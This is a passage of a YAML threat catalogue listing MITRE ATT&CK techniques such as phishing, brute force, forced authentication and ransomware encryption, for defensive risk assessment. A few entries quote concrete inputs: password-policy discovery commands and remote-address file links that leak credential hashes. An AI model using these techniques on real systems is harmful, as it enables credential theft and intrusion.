be intended to be + limited to the infrastructure being maintained, but may exist on the same network + as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) + used by the other party for access to internal network systems may be compromised + and used.(Citation: CISA IT Service Providers) + + + In Office 365 environments, organizations may grant Microsoft partners or resellers + delegated administrator permissions. By compromising a partner or reseller account, + an adversary may be able to leverage existing delegated administrator relationships + or send new delegated administrator offers to clients in order to gain administrative + control over the victim tenant.(Citation: Office 365 Delegated Administration) + + https://attack.mitre.org/techniques/T1199' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1593 + name: T1593 - Search Open Websites/Domains + provider: MITRE ATT&CK + description: 'Adversaries may search freely available websites and/or domains + for information about victims that can be used during targeting. Information + about victims may be available in various online sites, such as social media, + new sites, or those hosting information about business operations such as hiring + or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails + Google Hacking)(Citation: ExploitDB GoogleHacking) + + + Adversaries may search in different online sites depending on what information + they seek to gather. Information from these sources may reveal opportunities + for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) + or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), + establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) + or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or + initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) + or [Phishing](https://attack.mitre.org/techniques/T1566)). + + https://attack.mitre.org/techniques/T1593' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1098 + name: T1098 - Account Manipulation + provider: MITRE ATT&CK + description: "Adversaries may manipulate accounts to maintain and/or elevate access\ + \ to victim systems. Account manipulation may consist of any action that preserves\ + \ or modifies adversary access to a compromised account, such as modifying credentials\ + \ or permission groups. These actions could also include account activity designed\ + \ to subvert security policies, such as performing iterative password updates\ + \ to bypass password duration policies and preserve the life of compromised\ + \ credentials. \n\nIn order to create or manipulate accounts, the adversary\ + \ must already have sufficient permissions on systems or the domain. However,\ + \ account manipulation may also lead to privilege escalation where modifications\ + \ grant access to additional roles, permissions, or higher-privileged [Valid\ + \ Accounts](https://attack.mitre.org/techniques/T1078).\nhttps://attack.mitre.org/techniques/T1098" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1048 + name: T1048 - Exfiltration Over Alternative Protocol + provider: MITRE ATT&CK + description: "Adversaries may steal data by exfiltrating it over a different protocol\ + \ than that of the existing command and control channel. The data may also be\ + \ sent to an alternate network location from the main command and control server.\ + \ \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other\ + \ network protocol not being used as the main command and control channel. Adversaries\ + \ may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration\ + \ Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can\ + \ be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB\ + \ or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl\ + \ may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data\ + \ from a system.(Citation: 20 macOS Common Tools and Techniques)\n\nMany IaaS\ + \ and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub,\ + \ and AWS S3) support the direct download of files, emails, source code, and\ + \ other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).\n\ + https://attack.mitre.org/techniques/T1048" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1597 + name: T1597 - Search Closed Sources + provider: MITRE ATT&CK + description: 'Adversaries may search and gather information about victims from + closed sources that can be used during targeting. Information about victims + may be available for purchase from reputable private sources and databases, + such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: + D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable + sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling + Data) + + + Adversaries may search in different closed databases depending on what information + they seek to gather. Information from these sources may reveal opportunities + for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) + or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), + establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) + or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or + initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) + or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). + + https://attack.mitre.org/techniques/T1597' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1566 + name: T1566 - Phishing + provider: MITRE ATT&CK + description: "Adversaries may send phishing messages to gain access to victim\ + \ systems. All forms of phishing are electronically delivered social engineering.\ + \ Phishing can be targeted, known as spearphishing. In spearphishing, a specific\ + \ individual, company, or industry will be targeted by the adversary. More generally,\ + \ adversaries can conduct non-targeted phishing, such as in mass malware spam\ + \ campaigns.\n\nAdversaries may send victims emails containing malicious attachments\ + \ or links, typically to execute malicious code on victim systems. Phishing\ + \ may also be conducted via third-party services, like social media platforms.\ + \ Phishing may also involve social engineering techniques, such as posing as\ + \ a trusted source, as well as evasive techniques such as removing or manipulating\ + \ emails or metadata/headers from compromised accounts being abused to send\ + \ messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:\ + \ Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)\ + \ Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)\ + \ the identity of the sender which can be used to fool both the human recipient\ + \ as well as automated security tools.(Citation: cyberproof-double-bounce) \n\ + \nVictims may also receive phishing messages that instruct them to call a phone\ + \ number where they are directed to visit a malicious URL, download malware,(Citation:\ + \ sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)\ + \ or install adversary-accessible remote management tools onto their computer\ + \ (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:\ + \ Unit42 Luna Moth)\nhttps://attack.mitre.org/techniques/T1566" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1110 + name: T1110 - Brute Force + provider: MITRE ATT&CK + description: 'Adversaries may use brute force techniques to gain access to accounts + when passwords are unknown or when password hashes are obtained. Without knowledge + of the password for an account or set of accounts, an adversary may systematically + guess the password using a repetitive or iterative mechanism. Brute forcing + passwords can take place via interaction with a service that will check the + validity of those credentials or offline against previously acquired credential + data, such as password hashes. + + + Brute forcing credentials may take place at various points during a breach. + For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) + within a victim environment leveraging knowledge gathered from other post-compromise + behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), + [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password + Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may + also combine brute forcing activity with behaviors such as [External Remote + Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access. + + https://attack.mitre.org/techniques/T1110' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1565 + name: T1565 - Data Manipulation + provider: MITRE ATT&CK + description: 'Adversaries may insert, delete, or manipulate data in order to influence + external outcomes or hide activity, thus threatening the integrity of the data. + By manipulating data, adversaries may attempt to affect a business process, + organizational understanding, or decision making. + + + The type of modification and the impact it will have depends on the target application + and process as well as the goals and objectives of the adversary. For complex + systems, an adversary would likely need special expertise and possibly access + to specialized software related to the system that would typically be gained + through a prolonged information gathering campaign in order to have the desired + impact. + + https://attack.mitre.org/techniques/T1565' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1559 + name: T1559 - Inter-Process Communication + provider: MITRE ATT&CK + description: "Adversaries may abuse inter-process communication (IPC) mechanisms\ + \ for local code or command execution. IPC is typically used by processes to\ + \ share data, communicate with each other, or synchronize execution. IPC is\ + \ also commonly used to avoid situations such as deadlocks, which occurs when\ + \ processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse\ + \ IPC to execute arbitrary code or commands. IPC mechanisms may differ depending\ + \ on OS, but typically exists in a form accessible through programming languages/libraries\ + \ or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002)\ + \ or [Component Object Model](https://attack.mitre.org/techniques/T1559/001).\ + \ Linux environments support several different IPC mechanisms, two of which\ + \ being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums,\ + \ such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s,\ + \ may also leverage underlying IPC mechanisms. Adversaries may also use [Remote\ + \ Services](https://attack.mitre.org/techniques/T1021) such as [Distributed\ + \ Component Object Model](https://attack.mitre.org/techniques/T1021/003) to\ + \ facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)\n\ + https://attack.mitre.org/techniques/T1559" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1001 + name: T1001 - Data Obfuscation + provider: MITRE ATT&CK + description: 'Adversaries may obfuscate command and control traffic to make it + more difficult to detect. Command and control (C2) communications are hidden + (but not necessarily encrypted) in an attempt to make the content more difficult + to discover or decipher and to make the communication less conspicuous and hide + commands from being seen. This encompasses many methods, such as adding junk + data to protocol traffic, using steganography, or impersonating legitimate protocols. + + https://attack.mitre.org/techniques/T1001' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1039 + name: T1039 - Data from Network Shared Drive + provider: MITRE ATT&CK + description: 'Adversaries may search network shares on computers they have compromised + to find files of interest. Sensitive data can be collected from remote systems + via shared network drives (host shared directory, network file server, etc.) + that are accessible from the current system prior to Exfiltration. Interactive + command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) + may be used to gather information. + + https://attack.mitre.org/techniques/T1039' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1601 + name: T1601 - Modify System Image + provider: MITRE ATT&CK + description: 'Adversaries may make changes to the operating system of embedded + network devices to weaken defenses and provide new capabilities for themselves. On + such devices, the operating systems are typically monolithic and most of the + device functionality and capabilities are contained within a single file. + + + To change the operating system, the adversary typically only needs to affect + this one file, replacing or modifying it. This can either be done live in memory + during system runtime for immediate effect, or in storage to implement the change + on the next boot of the network device. + + https://attack.mitre.org/techniques/T1601' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1574 + name: T1574 - Hijack Execution Flow + provider: MITRE ATT&CK + description: 'Adversaries may execute their own malicious payloads by hijacking + the way operating systems run programs. Hijacking execution flow can be for + the purposes of persistence, since this hijacked execution may reoccur over + time. Adversaries may also use these mechanisms to elevate privileges or evade + defenses, such as application control or other restrictions on execution. + + + There are many ways an adversary may hijack the flow of execution, including + by manipulating how the operating system locates programs to be executed. How + the operating system locates libraries to be used by a program can also be intercepted. + Locations where the operating system looks for programs/resources, such as file + directories and in the case of Windows the Registry, could also be poisoned + to include malicious payloads. + + https://attack.mitre.org/techniques/T1574' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1078 + name: T1078 - Valid Accounts + provider: MITRE ATT&CK + description: 'Adversaries may obtain and abuse credentials of existing accounts + as a means of gaining Initial Access, Persistence, Privilege Escalation, or + Defense Evasion. Compromised credentials may be used to bypass access controls + placed on various resources on systems within the network and may even be used + for persistent access to remote systems and externally available services, such + as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: + volexity_0day_sophos_FW) Compromised credentials may also grant an adversary + increased privilege to specific systems or access to restricted areas of the + network. Adversaries may choose not to use malware or tools in conjunction with + the legitimate access those credentials provide to make it harder to detect + their presence. + + + In some cases, adversaries may abuse inactive accounts: for example, those belonging + to individuals who are no longer part of an organization. Using these accounts + may allow the adversary to evade detection, as the original account user will + not be present to identify any anomalous activity taking place on their account.(Citation: + CISA MFA PrintNightmare) + + + The overlap of permissions for local, domain, and cloud accounts across a network + of systems is of concern because the adversary may be able to pivot across accounts + and systems to reach a high level of access (i.e., domain or enterprise administrator) + to bypass access controls set within the enterprise.(Citation: TechNet Credential + Theft) + + https://attack.mitre.org/techniques/T1078' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1571 + name: T1571 - Non-Standard Port + provider: MITRE ATT&CK + description: 'Adversaries may communicate using a protocol and port pairing that + are typically not associated. For example, HTTPS over port 8088(Citation: Symantec + Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed + to the traditional port 443. Adversaries may make changes to the standard port + used by a protocol to bypass filtering or muddle analysis/parsing of network + data. + + + Adversaries may also make changes to victim systems to abuse non-standard ports. + For example, Registry keys and other configuration settings can be used to modify + protocol and port pairings.(Citation: change_rdp_port_conti) + + https://attack.mitre.org/techniques/T1571' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1068 + name: T1068 - Exploitation for Privilege Escalation + provider: MITRE ATT&CK + description: 'Adversaries may exploit software vulnerabilities in an attempt to + elevate privileges. Exploitation of a software vulnerability occurs when an + adversary takes advantage of a programming error in a program, service, or within + the operating system software or kernel itself to execute adversary-controlled + code. Security constructs such as permission levels will often hinder access + to information and use of certain techniques, so adversaries will likely need + to perform privilege escalation to include use of software exploitation to circumvent + those restrictions. + + + When initially gaining access to a system, an adversary may be operating within + a lower privileged process which will prevent them from accessing certain resources + on the system. Vulnerabilities may exist, usually in operating system components + and software commonly running at higher permissions, that can be exploited to + gain higher levels of access on the system. This could enable someone to move + from unprivileged or user level permissions to SYSTEM or root permissions depending + on the component that is vulnerable. This could also enable an adversary to + move from a virtualized environment, such as within a virtual machine or container, + onto the underlying host. This may be a necessary step for an adversary compromising + an endpoint system that has been properly configured and limits other privilege + escalation methods. + + + Adversaries may bring a signed vulnerable driver onto a compromised machine + so that they can exploit the vulnerability to execute code in kernel mode. This + process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: + ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may + include the vulnerable driver with files delivered during Initial Access or + download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) + or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570). + + https://attack.mitre.org/techniques/T1068' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1531 + name: T1531 - Account Access Removal + provider: MITRE ATT&CK + description: "Adversaries may interrupt availability of system and network resources\ + \ by inhibiting access to accounts utilized by legitimate users. Accounts may\ + \ be deleted, locked, or manipulated (ex: changed credentials) to remove access\ + \ to accounts. Adversaries may also subsequently log off and/or perform a [System\ + \ Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious\ + \ changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42\ + \ LockerGoga 2019)\n\nIn Windows, [Net](https://attack.mitre.org/software/S0039)\ + \ utility, Set-LocalUser and Set-ADAccountPassword\ + \ [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be\ + \ used by adversaries to modify user accounts. In Linux, the passwd\ + \ utility may be used to change passwords. Accounts could also be disabled by\ + \ Group Policy. \n\nAdversaries who use ransomware or similar attacks may first\ + \ perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485)\ + \ and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede\ + \ incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)\ + \ objective.\nhttps://attack.mitre.org/techniques/T1531" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1027 + name: T1027 - Obfuscated Files or Information + provider: MITRE ATT&CK + description: "Adversaries may attempt to make an executable or file difficult\ + \ to discover or analyze by encrypting, encoding, or otherwise obfuscating its\ + \ contents on the system or in transit. This is common behavior that can be\ + \ used across different platforms and the network to evade defenses. \n\nPayloads\ + \ may be compressed, archived, or encrypted in order to avoid detection. These\ + \ payloads may be used during Initial Access or later to mitigate detection.\ + \ Sometimes a user's action may be required to open and [Deobfuscate/Decode\ + \ Files or Information](https://attack.mitre.org/techniques/T1140) for [User\ + \ Execution](https://attack.mitre.org/techniques/T1204). The user may also be\ + \ required to input a password to open a password protected compressed/encrypted\ + \ file that was provided by the adversary. (Citation: Volexity PowerDuke November\ + \ 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.\ + \ \n\nPortions of files can also be encoded to hide the plain-text strings that\ + \ would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A\ + \ We Live Security Analysis) Payloads may also be split into separate, seemingly\ + \ benign files that only reveal malicious functionality when reassembled. (Citation:\ + \ Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also abuse [Command\ + \ Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands\ + \ executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).\ + \ Environment variables, aliases, characters, and other platform/language specific\ + \ semantics can be used to evade signature based detections and application\ + \ control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye\ + \ Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)\n\ + https://attack.mitre.org/techniques/T1027" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1201 + name: T1201 - Password Policy Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to access detailed information about the + password policy used within an enterprise network or cloud environment. Password + policies are a way to enforce complex passwords that are difficult to guess + or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This + information may help the adversary to create a list of common passwords and + launch dictionary and/or brute force attacks which adheres to the policy (e.g. + if the minimum password length should be 8, then not trying passwords such as + ''pass123''; not checking for more than 3-4 passwords per account if the lockout + is set to 6 as to not lock out accounts). + + + Password policies can be set and discovered on Windows, Linux, and macOS systems + via various command shell utilities such as net accounts (/domain), + Get-ADDefaultDomainPasswordPolicy, chage -l , + cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies + (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password + Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) + on network devices to discover password policy information (e.g. show + aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A) + + + Password policies can be discovered in cloud environments using available APIs + such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). + + https://attack.mitre.org/techniques/T1201' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1546 + name: T1546 - Event Triggered Execution + provider: MITRE ATT&CK + description: 'Adversaries may establish persistence and/or elevate privileges + using system mechanisms that trigger execution based on specific events. Various + operating systems have means to monitor and subscribe to events such as logons + or other user activity such as running specific applications/binaries. Cloud + environments may also support various functions and services that monitor and + can be invoked in response to specific cloud events.(Citation: Backdooring an + AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft + DART Case Report 001) + + + Adversaries may abuse these mechanisms as a means of maintaining persistent + access to a victim via repeatedly executing malicious code. After gaining access + to a victim system, adversaries may create/modify event triggers to point to + malicious content that will be executed whenever the event trigger is invoked.(Citation: + FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) + + + Since the execution can be proxied by an account with higher permissions, such + as SYSTEM or service accounts, an adversary may be able to abuse these triggered + execution mechanisms to escalate their privileges. + + https://attack.mitre.org/techniques/T1546' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1187 + name: T1187 - Forced Authentication + provider: MITRE ATT&CK + description: 'Adversaries may gather credential material by invoking or forcing + a user to automatically provide authentication information through a mechanism + in which they can intercept. + + + The Server Message Block (SMB) protocol is commonly used in Windows networks + for authentication and communication between systems for access to resources + and file sharing. When a Windows system attempts to connect to an SMB resource + it will automatically attempt to authenticate and send credential information + for the current user to the remote system. (Citation: Wikipedia Server Message + Block) This behavior is typical in enterprise environments so that users do + not need to enter credentials to access network resources. + + + Web Distributed Authoring and Versioning (WebDAV) is also typically used by + Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is + an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: + Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security) + + + Adversaries may take advantage of this behavior to gain access to user account + hashes through forced SMB/WebDAV authentication. An adversary can send an attachment + to a user through spearphishing that contains a resource link to an external + server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), + or place a specially crafted file on navigation path for privileged accounts + (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed + by victim(s). When the user''s system accesses the untrusted resource it will + attempt authentication and send information, including the user''s hashed credentials, + over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) + With access to the credential hash, an adversary can perform off-line [Brute + Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to + plaintext credentials. (Citation: Cylance Redirect to SMB) + + + There are several different ways this can occur. (Citation: Osanda Stealing + NetNTLM Hashes) Some specifics from in-the-wild use include: + + + * A spearphishing attachment containing a document with a resource that is automatically + loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). + The document can include, for example, a request similar to file[:]//[remote + address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT + Energy Oct 2017) + + * A modified .LNK or .SCF file with the icon filename pointing to an external + reference such as \\[remote address]\pic.png that will force the + system to load the resource when the icon is rendered to repeatedly gather credentials. + (Citation: US-CERT APT Energy Oct 2017) + + https://attack.mitre.org/techniques/T1187' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1599 + name: T1599 - Network Boundary Bridging + provider: MITRE ATT&CK + description: 'Adversaries may bridge network boundaries by compromising perimeter + network devices or internal devices responsible for network segmentation. Breaching + these devices may enable an adversary to bypass restrictions on traffic routing + that otherwise separate trusted and untrusted networks. + + + Devices such as routers and firewalls can be used to create boundaries between + trusted and untrusted networks. They achieve this by restricting traffic types + to enforce organizational policy in an attempt to reduce the risk inherent in + such connections. Restriction of traffic can be achieved by prohibiting IP + addresses, layer 4 protocol ports, or through deep packet inspection to identify + applications. To participate with the rest of the network, these devices can + be directly addressable or transparent, but their mode of operation has no bearing + on how the adversary can bypass them when compromised. + + + When an adversary takes control of such a boundary device, they can bypass its + policy enforcement to pass normally prohibited traffic across the trust boundary + between the two separated networks without hinderance. By achieving sufficient + rights on the device, an adversary can reconfigure the device to allow the traffic + they want, allowing them to then further achieve goals such as command and control + via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration + of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). + Adversaries may also target internal devices responsible for network segmentation + and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) + to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the + cases where a border device separates two separate organizations, the adversary + can also facilitate lateral movement into new victim environments. + + https://attack.mitre.org/techniques/T1599' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1486 + name: T1486 - Data Encrypted for Impact + provider: MITRE ATT&CK + description: "Adversaries may encrypt data on target systems or on large numbers\ + \ of systems in a network to interrupt availability to system and network resources.\ + \ They can attempt to render stored data inaccessible by encrypting files or\ + \ data on local and remote drives and withholding access to a decryption key.\ + \ This may be done in order to extract monetary compensation from a victim in\ + \ exchange for decryption or a decryption key (ransomware) or to render data\ + \ permanently inaccessible in cases where the key is not saved or transmitted.(Citation:\ + \ US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT\ + \ NotPetya 2017)(Citation: US-CERT SamSam 2018)\n\nIn the case of ransomware,\ + \ it is typical that common user files like Office documents, PDFs, images,\ + \ videos, audio, text, and source code files will be encrypted (and often renamed\ + \ and/or tagged with specific file markers). Adversaries may need to first employ\ + \ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222)\ + \ or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in\ + \ order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack\ + \ Conti July 2020) In some cases, adversaries may encrypt critical system files,\ + \ disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) \n\nTo maximize\ + \ impact on the target organization, malware designed for encrypting data may\ + \ have worm-like features to propagate across a network by leveraging other\ + \ attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078),\ + \ [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows\ + \ Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye\ + \ WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also\ + \ leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001),\ + \ such as changing victim wallpapers, or otherwise intimidate victims by sending\ + \ ransom notes or other messages to connected printers (known as \"print bombing\"\ + ).(Citation: NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage\ + \ objects within compromised accounts may also be encrypted.(Citation: Rhino\ + \ S3 Ransomware Part 1)\nhttps://attack.mitre.org/techniques/T1486" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1553 + name: T1553 - Subvert Trust Controls + provider: MITRE ATT&CK + description: 'Adversaries may undermine security controls that will either warn + users of untrusted activity or prevent execution of untrusted programs. Operating + systems and security products may contain mechanisms to identify programs or + websites as possessing some level of trust. Examples of such features would + include a program being allowed to run because it is signed by a valid code + signing certificate, a program prompting the user with a warning because it + has an attribute set from being downloaded from the Internet, or getting an + indication that you are about to connect to an untrusted site. + + + Adversaries may attempt to subvert these trust mechanisms. The method adversaries + use will depend on the specific mechanism they seek to subvert. Adversaries + may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) + or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of + subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) + Adversaries may also create or steal code signing certificates to acquire trust + on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec + Digital Certificates) + + https://attack.mitre.org/techniques/T1553' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1573 + name: T1573 - Encrypted Channel + provider: MITRE ATT&CK + description: 'Adversaries may employ a known encryption algorithm to conceal command + and control traffic rather than relying on any inherent protections provided + by a communication protocol. Despite the use of a secure algorithm, these implementations + may be vulnerable to reverse engineering if secret keys are encoded and/or generated + within malware samples/configuration files. + + https://attack.mitre.org/techniques/T1573' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1056 + name: T1056 - Input Capture + provider: MITRE ATT&CK + description: 'Adversaries may use methods of capturing user input to obtain credentials + or collect information. During normal system usage, users often provide credentials + to various different locations, such as login pages/portals or system dialog + boxes. Input capture mechanisms may be transparent to the user (e.g. [Credential + API Hooking](https://attack.mitre.org/techniques/T1056/004)) or rely on deceiving + the user into providing input into what they believe to be a genuine service + (e.g. [Web Portal Capture](https://attack.mitre.org/techniques/T1056/003)). + + https://attack.mitre.org/techniques/T1056' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1203 + name: T1203 - Exploitation for Client Execution + provider: MITRE ATT&CK + description: 'Adversaries may exploit software vulnerabilities in client applications + to execute code. Vulnerabilities can exist in software due to unsecure coding + practices that can lead to unanticipated behavior. Adversaries can take advantage + of certain vulnerabilities through targeted exploitation for the purpose of + arbitrary code execution. Oftentimes the most valuable exploits to an offensive + toolkit are those that can be used to obtain code execution on a remote system + because they can be used to gain access to that system. Users will expect to + see files related to the applications they commonly used to do work, so they + are a useful target for exploit research and development because of their high + utility. + + + Several types exist: + + + ### Browser-based Exploitation + + + Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) + and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint + systems may be compromised through normal web browsing or from certain users + being targeted by links in spearphishing emails to adversary controlled sites + used to exploit the web browser. These often do not require an action by the + user for the exploit to be executed. + + + ### Office Applications + + + Common office and productivity applications such as Microsoft Office are also + targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious + files will be transmitted directly as attachments or through links to download + them. These require the user to open the document or file for the exploit to + run. + + + ### Common Third-party Applications + + + Other applications that are commonly seen or are part of the software deployed + in a target network may also be used for exploitation. Applications such as + Adobe Reader and Flash, which are common in enterprise environments, have been + routinely targeted by adversaries attempting to gain access to systems. Depending + on the software and nature of the vulnerability, some may be exploited in the + browser or require the user to open a file. For instance, some Flash exploits + have been delivered as objects within Microsoft Office documents. + + https://attack.mitre.org/techniques/T1203' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1570 + name: T1570 - Lateral Tool Transfer + provider: MITRE ATT&CK + description: 'Adversaries may transfer tools or other files between systems in + a compromised environment. Once brought into the victim environment (i.e., [Ingress + Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be + copied from one system to another to stage adversary tools or other files over + the course of an operation. + + + Adversaries may copy files between internal victim systems to support lateral + movement using inherent file sharing protocols such as file sharing over [SMB/Windows + Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network + shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: + Unit42 LockerGoga 2019) + + + Files can also be transferred using native or otherwise present tools on the + victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). + In some cases, adversaries may be able to leverage [Web Service](https://attack.mitre.org/techniques/T1102)s + such as Dropbox or OneDrive to copy files from one machine to another via shared, + automatically synced folders.(Citation: Dropbox Malware Sync) + + https://attack.mitre.org/techniques/T1570' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1095 + name: T1095 - Non-Application Layer Protocol + provider: MITRE ATT&CK + description: 'Adversaries may use an OSI non-application layer protocol for communication + between host and C2 server or among infected hosts within a network. The list + of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples + include use of network layer protocols, such as the Internet Control Message + Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol + (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled + protocols, such as Serial over LAN (SOL). + + + ICMP communication between hosts is one example.(Citation: Cisco 